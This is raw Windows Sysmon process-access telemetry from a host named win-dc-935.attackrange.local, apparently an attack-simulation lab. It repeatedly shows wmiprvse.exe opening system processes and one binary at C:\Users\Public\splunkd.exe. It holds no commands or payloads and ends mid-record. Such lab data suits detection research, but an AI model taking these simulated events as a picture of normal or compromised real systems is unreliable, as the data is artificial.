13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 